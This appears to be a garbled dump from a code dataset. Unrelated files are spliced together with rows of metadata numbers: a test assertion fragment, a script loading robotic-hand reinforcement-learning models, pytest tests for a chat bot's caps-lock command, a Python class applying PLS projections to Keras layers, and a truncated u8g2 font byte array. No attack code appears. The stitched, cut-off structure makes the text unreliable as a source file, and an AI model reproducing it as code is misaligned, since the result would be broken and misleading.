assert new_dtos['destinations'][0].connection_configuration['password'] == 'SECRET_POSTGRES_PASSWORD' | 334.231788 | 42,831 | 0.603103 | 5,332 | 50,469 | 5.531883 | 0.069955 | 0.187144 | 0.229726 | 0.151004 | 0.822959 | 0.757899 | 0.71569 | 0.669345 | 0.63056 | 0.613914 | 0 | 0.005146 | 0.095128 | 50,469 | 151 | 42,832 | 334.231788 | 0.640733 | 0.016862 | 0 | 0.163265 | 0 | 0 | 0.514528 | 0.026388 | 0 | 0 | 0 | 0 | 0.704082 | 1 | 0.102041 | false | 0.010204 | 0.020408 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cdb0406c208a87258d238272949446bd64e3d8c1 | 7,308 | py | Python | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | collect_exp.py | mk37972/PASCAPE | 1fc7c0b17b7313dd13ceb93ed2c8e37b206ece87 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 15:36:15 2020
@author: mincheol
"""
from baselines import run
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v3', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [6]:
# for seed in [10,750,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/animate/harsh_65/PassiveCtrl_randomly_heavy/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/animate/harsh_65/PassiveCtrl_randomly_heavy/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v2', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [3]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/chip/harsh_85/For_IM/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/chip/harsh_85/For_IM/force_dist_data_before/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [4]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/block/test/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/block/test/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v5', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/block/harsh_65/For_IM/RL/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/block/harsh_65/For_IM/RL/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=FetchPickAndPlaceFragile-v6', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/chip/harsh_85/For_IM/RL/fpp_demo25bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/chip/harsh_85/For_IM/RL/force_dist_data_before/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=NuFingersRotate-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/NuFingers/harsh_65/For_IM/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/NuFingers/harsh_65/IR/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=NuFingersRotate-v2', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [2]:
# for seed in [10,500,1000]:
# for pert in ['delay']:
# loadpath = '--load_path=./models/NuFingers/harsh_65/For_IM/RL/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# filename = '--filename=./models/NuFingers/harsh_65/For_IM/RL/force_dist_data/Force_Distance_data_random_{}_{}{}'.format(dim,pert,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# finalargs = defaultargs + [loadpath, perturb, algdim]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=CheolFingersManipulate-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [5]:
# for seed in [10]:
# for pert in ['none']:
# loadpath = '--load_path=./models/Dark/Manipulate/Delayed_env/SCAPE_10/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# eval_env = '--eval_env=True'
# finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
# run.main(finalargs)
# defaultargs = ['--alg=her','--env=CheolFingersSearch-v1', '--num_timesteps=0', '--play']
# if __name__ == '__main__':
# for dim in [3]:
# for seed in [10]:
# for pert in ['none']:
# loadpath = '--load_path=./PASCAPE/models/Dark/Search/PASCAPE_DR/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
# perturb = '--perturb={}'.format(pert)
# algdim = '--algdim={}'.format(dim)
# eval_env = '--eval_env=False'
# finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
# run.main(finalargs)
defaultargs = ['--alg=her','--env=CheolFingersLiquid-v1', '--num_timesteps=0', '--play']
if __name__ == '__main__':
for dim in [6]:
for seed in [10]:
for pert in ['none']:
loadpath = '--load_path=./PASCAPE/models/Liquid/PASCAPE_DR/Sim_NuFingers_bad{}dim_{}'.format(dim,seed)
perturb = '--perturb={}'.format(pert)
algdim = '--algdim={}'.format(dim)
eval_env = '--eval_env=True'
finalargs = defaultargs + [loadpath, perturb, algdim, eval_env]
run.main(finalargs) | 49.378378 | 168 | 0.533525 | 758 | 7,308 | 4.861478 | 0.133245 | 0.065943 | 0.046133 | 0.054274 | 0.93867 | 0.92673 | 0.92673 | 0.903121 | 0.903121 | 0.878697 | 0 | 0.02887 | 0.293788 | 7,308 | 148 | 169 | 49.378378 | 0.685139 | 0.831828 | 0 | 0 | 0 | 0 | 0.185641 | 0.101538 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a90e842b7b21aba1f15adbfd21da8f97ea0e1508 | 8,173 | py | Python | hallo/test/modules/channel_control/test_channel_caps.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/channel_control/test_channel_caps.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/channel_control/test_channel_caps.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
def test_caps_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert test_hallo.test_chan.use_caps_lock
# Try toggling again
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert not test_hallo.test_chan.use_caps_lock
def test_caps_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps on")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan.use_caps_lock
def test_caps_off(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps off")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan.use_caps_lock
def test_caps_channel_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
# Try toggling again
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "toggle" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_channel_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel on"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
def test_caps_channel_off(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel off"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_on_channel(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps on other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set on" in data[0].text.lower()
assert test_hallo.test_chan1.use_caps_lock
def test_caps_off_channel(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = True
test_hallo.test_chan1.use_caps_lock = True
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps off other_channel"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" not in data[0].text.lower()
assert "caps lock set off" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_not_in_channel_toggle(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_not_in_channel_on(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel on")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
def test_caps_no_bool(hallo_getter):
test_hallo = hallo_getter({"channel_control"})
test_hallo.test_chan1 = test_hallo.test_server.get_channel_by_address(
"other_channel".lower(), "other_channel"
)
test_hallo.test_chan1.in_channel = False
test_hallo.test_chan1.use_caps_lock = False
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "channel caps other_channel word"
)
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower()
assert not test_hallo.test_chan1.use_caps_lock
| 43.705882 | 121 | 0.749541 | 1,204 | 8,173 | 4.70515 | 0.038206 | 0.217652 | 0.259312 | 0.114034 | 0.990468 | 0.990468 | 0.990468 | 0.989585 | 0.989585 | 0.989585 | 0 | 0.009994 | 0.155267 | 8,173 | 186 | 122 | 43.94086 | 0.810545 | 0.004527 | 0 | 0.716049 | 0 | 0 | 0.107218 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.067901 | false | 0 | 0.006173 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a919dccda4eeb340bd9e8dd9f1657d6a17af3ca9 | 7,039 | py | Python | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | 2 | 2019-07-18T21:08:13.000Z | 2020-03-21T10:44:26.000Z | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | null | null | null | latent_hyper_net.py | arturjordao/LatentHyperNet | 5bf253548b838ed0348d24024381d58c771253ec | [
"MIT"
] | null | null | null | import numpy as np
import sklearn
import copy
from sklearn.base import BaseEstimator
from sklearn.base import ClassifierMixin
from sklearn.cross_decomposition import PLSRegression
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from keras.models import Model
from keras.layers import *
class LatentHyperNet(BaseEstimator, ClassifierMixin):
__name__ = 'Latent Hyper Net'
def __init__(self, n_comp=2,
dm_method=None, oaa=False, as_network=True,
model=None, layers=None, batch_size=32):
self.n_comp = n_comp
self.dm_layer = []
self.dm_method = dm_method
self.oaa = oaa
self.as_network = as_network
self.model = self.custom_model(model=model, layers=layers)
self.layers = layers
self.batch_size = batch_size
def custom_model(self, model, layers):
for i in range(0, len(model.layers)):
if i > layers[-1]:
model.layers.pop()
outputs = []
for i in layers:
layer = model.get_layer(index=i)
outputs.append(Flatten()(layer.output))
model = Model(model.input, outputs)
return model
def pls_as_network(self):
pls_into_fc = []
for layer_idx in range(0, len(self.layers)):
for i in range(0, len(self.dm_layer[layer_idx])):
dm = self.dm_layer[layer_idx][i]
id = '{}_{}'.format(layer_idx, i)
w = dm.x_rotations_
x_mean = dm.x_mean_
x_std = dm.x_std_
H = self.model.get_layer(index=self.layers[layer_idx]).output
H = Flatten(name='flatten_pls_' + id)(H)
H = Lambda(lambda x: (x - x_mean) / x_std)(H)
H = Dense(self.n_comp, weights=[w],
use_bias=False,
trainable=False,
name='pls_model_' + id)(H)
pls_into_fc.append(H)
H = None
H = concatenate(pls_into_fc)
self.model = Model(self.model.input, H)
for i in range(0, len(self.model.layers)):
self.model.layers[i].trainable = False
return self
def fit(self, X, y):
if X.shape[0] != y.shape[0]:
raise ValueError()
if (y.shape[1]==1):
self.oaa = False
self.dm_layer = [[] for i in range(0, len(self.layers))]
dm_template = PLSRegression(n_components=self.n_comp)
X = self.model.predict(X)
y_tmp = np.argmax(y, axis=1)
num_classes = np.unique(y_tmp)
for layer_idx in range(0, len(self.layers)):
if self.oaa:
for c in num_classes:
target = np.ones(y_tmp.shape)
target[y_tmp != c] = -1
dm = copy.copy(dm_template)
dm.fit(X[layer_idx], target)
self.dm_layer[layer_idx].append(dm)
del dm
else:
dm = copy.copy(dm_template)
dm.fit(X[layer_idx], y)
self.dm_layer[layer_idx].append(dm)
del dm
if self.as_network:
self.pls_as_network()
return self
def transform(self, X):
proj_x = None
X = self.model.predict(X, batch_size=256)
for layer_idx in range(0, len(self.layers)):
for pls_model in self.dm_layer[layer_idx]:
if proj_x is None:
proj_x = pls_model.transform(X[layer_idx])
else:
proj_tmp = pls_model.transform(X[layer_idx])
proj_x = np.column_stack((proj_x, proj_tmp))
return proj_x
class LatentHyperNetSingleProjection(BaseEstimator, ClassifierMixin):
__name__ = 'Latent Hyper Net'
def __init__(self, n_comp=2,
dm_method=None, oaa=False, as_network=True,
model=None, layers=None, batch_size=32):
self.n_comp = n_comp
self.dm_layer = []
self.dm_method = dm_method
self.oaa = oaa
self.as_network = as_network
self.model = self.custom_model(model=model, layers=layers)
self.layers = layers
self.batch_size = batch_size
def custom_model(self, model, layers):
for i in range(0, len(model.layers)):
if i > layers[-1]:
model.layers.pop()
outputs = []
for i in layers:
layer = model.get_layer(index=i)
outputs.append(Flatten()(layer.output))
outputs = concatenate(outputs)
model = Model(model.input, outputs)
return model
def pls_as_network(self):
pls_into_fc = []
id = 0
for i in range(0, len(self.dm_layer)):
dm = self.dm_layer[i]
id = id + 1
w = dm.x_rotations_
x_mean = dm.x_mean_
x_std = dm.x_std_
H = self.model.get_layer(index=-1).output
H = Lambda(lambda x: (x - x_mean) / x_std)(H)
H = Dense(self.n_comp, weights=[w],
use_bias=False,
trainable=False,
name='pls_model_{}'.format(id))(H)
pls_into_fc.append(H)
H = None
H = concatenate(pls_into_fc)
self.model = Model(self.model.input, H)
for i in range(0, len(self.model.layers)):
self.model.layers[i].trainable = False
return self
def fit(self, X, y):
if X.shape[0] != y.shape[0]:
raise ValueError()
# if np.unique(y).shape[0] == 2:
# self.oaa = False
self.dm_layer = []
dm_template = PLSRegression(n_components=self.n_comp)
X = self.model.predict(X)
y_tmp = np.argmax(y, axis=1)
num_classes = np.unique(y_tmp)
if self.oaa:
for c in num_classes:
target = np.ones(y_tmp.shape)
target[y_tmp != c] = -1
dm = copy.copy(dm_template)
dm.fit(X, target)
self.dm_layer.append(dm)
del dm
else:
dm = copy.copy(dm_template)
dm.fit(X, y)
self.dm_layer.append(dm)
del dm
if self.as_network:
self.pls_as_network()
return self
def transform(self, X):
proj_x = None
X = self.model.predict(X)
for pls_model in self.dm_layer:
if proj_x is None:
proj_x = pls_model.transform(X)
else:
proj_tmp = pls_model.transform(X)
proj_x = np.column_stack((proj_x, proj_tmp))
return proj_x | 31.146018 | 78 | 0.517971 | 886 | 7,039 | 3.914221 | 0.120767 | 0.046713 | 0.044406 | 0.031719 | 0.846597 | 0.836505 | 0.816897 | 0.775375 | 0.775375 | 0.741061 | 0 | 0.008291 | 0.383151 | 7,039 | 226 | 79 | 31.146018 | 0.790419 | 0.007245 | 0 | 0.775862 | 0 | 0 | 0.010501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057471 | false | 0 | 0.057471 | 0 | 0.183908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a91e2e2b7eba484c8912a42f98bb0071f4ad2484 | 49,481 | py | Python | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 6 | 2020-02-27T11:17:54.000Z | 2020-12-04T10:14:26.000Z | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 4 | 2020-07-29T14:07:04.000Z | 2021-05-19T05:10:33.000Z | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 3 | 2020-05-16T08:15:16.000Z | 2021-09-30T10:39:37.000Z | data=b'\xbe\x00\x04\x03\x05\x05\x05\x06\x06\x28\x25\xf0\xf7\x12\xfb\x12\xfc\x02\xeb\x06\x3a\x12\xe9\x20\x06\x00\xc0\x10\x05\x21\x09\x42\x4e\x10\x85\x0f\x8a\x0c\x22\x09\xc6\x48\x36\x05\x11\x3e\x11\x23\x2b\x4f\x42\x10\x36\x19\x41\x19\x41\x11\x41\x19\x41\x19\xa1\x83\x8b\x83\x2b\x11\x41\x19\x41\x19\x41\x11\xa9\x83\x8b\x83\x23\x19\x41\x91\x41\x11\x41\x19\x41\x19\x31\x00\x24\x29\xcb\x4a\x0f\x2e\x49\xb9\x9b\x03\x89\x09\x29\x11\x29\x11\x29\x11\x31\x09\xb1\xc2\x49\xba\x32\x89\x29\x11\x29\x11\x29\x91\x21\x89\x03\x93\x83\x38\x49\x21\x00\x25\x30\x51\x42\x30\x16\xc2\x09\xb3\x89\x91\x29\x11\x21\x35\x42\x32\x42\x23\xab\x4c\xe6\x48\xc6\x25\x28\x25\xec\x4c\xa6\x26\x84\x84\x46\x84\xd4\x08\xc9\x08\x29\x91\x1a\x99\x18\xb3\x18\x24\x01\x26\x28\x50\x46\x30\x36\x5a\xcb\x19\xc1\x19\xc1\x19\xc1\x91\x49\x87\x47\x13\x23\x43\x46\x33\x56\x23\x12\x63\x22\x12\x63\x16\x64\x34\x54\x53\x07\x12\x62\x35\x04\x27\x0b\xc4\x44\xd6\x84\x83\x0a\x11\x15\x00\x28\x16\xc6\x46\x0e\xad\x20\x19\x99\x19\x99\x19\x99\xfd\x91\xd0\x90\xd0\x90\x94\x54\x00\x29\x16\xc6\x46\x0e\x85\x28\x45\x43\x42\x43\x42\x33\xfb\x8d\xcc\x8c\xcc\x8c\xa2\x28\x00\x2a\x18\x29\xc9\x94\xa5\xc0\xa8\x90\x18\x8a\x88\x11\x09\xa9\x88\x28\x09\x19\x99\xa0\x18\x09\x00\x2b\x0e\xee\x45\x10\x36\x61\x3d\x3b\xf8\x4c\x58\x9f\x01\x2c\x0c\x03\xc9\x0d\x85\x03\x09\x15\x14\x12\x00\x2d\x08\x45\xc8\x13\x85\x83\x01\x2e\x08\x63\x48\x10\x85\x03\x01\x2f\x1d\xcc\x42\x8e\x55\x49\x51\xc9\x49\xc9\x49\x51\x49\x51\x49\x51\x49\x51\x49\x51\xc9\x49\xc9\x49\x51\x49\x51\x00\x30\x19\x4d\x46\x10\xa6\xba\xab\x99\x55\x23\x53\x13\x73\xfe\xdd\xc4\xd4\xc8\xd4\xcc\xaa\xbb\x22\x00\x31\x0b\x46\x4e\x10\x86\x83\x9a\xfd\xff\x01\x32\x19\x4b\x4a\x10\x16\x9b\x83\x09\xa9\xc9\xc1\xed\x06\xe7\xc6\xc8\xe6\x06\x05\xe7\x06\x0f\x1e\x04\x33\x1a\x4b\x4a\x10\x8e\x9b\x83\x09\x29\xc2\x0d\xe5\xa4\xca\x0e\x29\x07\x17\x52\x51\x1c\x88\x1c\xc4\x00\x34\x1d\x4c\x4a\x10\xbe\xc9\x41\xba\x3a\x09\x31\x11\xa9\x11\xa1\x19\x21\x35\x52\x22\x53\x22\x07\x0f\x06\x45\x75\x02\x35\x13\x49\x4e\x10\x86\x07\x76\xda\x15\x9d\x31\xdb\x55\x0d\xc5\x89\x0d\x00\x36\x21\x4c\x4a\x10\x26\xab\x83\x98\xa9\x90\xc9\xc1\xc9\x25\x34\x13\x17\x35\x13\x63\xce\x26\xc4\x26\xa6\x46\x66\x66\x0e\xc2\x6a\x00\x37\x17\x4c\x4e\x10\x86\x0f\x26\x27\x55\x4e\x4a\x0e\x4e\x4a\x0e\x4e\x0e\x4e\x2e\x9c\x1c\x04\x38\x22\x4c\x4a\x10\xa6\xb2\xa3\x99\x19\x29\x19\x29\x19\x29\x99\x19\x29\x33\xab\x83\x98\x91\x8a\xa9\x33\x67\x13\x43\x23\x07\x52\x36\x00\x39\x21\x4c\x4a\x10\x9e\xb2\x83\x98\x19\x92\xa1\x89\x31\x89\x31\x67\x57\x13\x33\x25\x16\x33\x24\x93\x92\x4b\xa2\x66\x0e\x82\xac\x00\x3a\x0b\xa3\x49\x10\x85\x03\x79\xb0\x03\x01\x3b\x0e\x43\xca\x0d\x85\x03\x79\x48\x0b\x15\x14\x21\x00\x3c\x10\xee\x45\x10\xee\xd8\xc9\xba\x86\x1c\xb3\x6d\x4b\x3c\x1d\x3d\x0a\xce\x44\x12\x86\xdf\x43\x1f\x7c\x3e\x12\xee\x45\x10\x86\xe8\x61\xda\xb6\xc4\x0c\x19\xd6\xb5\x9c\x8d\x06\x3f\x15\x4a\x42\x70\x0d\x9b\x03\x89\x28\xba\xcd\xe6\xd4\x8d\xcd\xad\x07\x9e\x5b\x04\x40\x35\x54\x4e\xb0\xc6\xdb\x03\xba\x2a\xaa\xd1\x99\x21\x13\x19\x21\x23\x09\x21\xa1\x20\x09\x19\x21\x21\xa2\xa0\x21\x1a\x21\x29\x1a\x99\x21\x09\x19\x91\x10\x91\x09\x99\x12\x1b\x55\xeb\x61\xc8\x42\x0f\x86\x2d\x01\x41\x24\x51\x42\x30\xbe\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x42\x22\x4b\x4a\xd0\x85\xa3\x03\x91\x19\x8a\xa1\x89\xa1\x89\xa1\x89\x99\x91\x19\x99\xa3\x03\x91\x19\x8a\xa1\x2b\x8f\x0e\x2e\x0e\x62\x00\x43\x1c\x4f\x46\x30\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x08\x01\x44\x1f\x4f\x4a\x70\x86\x83\xa9\x83\x9a\x31\x92\x39\x8a\xc1\x89\xc1\x4b\x7f\x29\x31\x38\x31\x37\x32\x46\x72\x40\x74\x20\x06\x45\x16\x4b\x4a\xd0\x85\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x46\x11\x4b\x4a\xb0\x85\x0f\x08\xf7\xf0\x60\xe2\x60\x62\x70\x3f\x04\x47\x1f\x4f\x46\x50\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\x84\x00\x48\x0f\x4e\x4a\x50\x86\x41\xff\x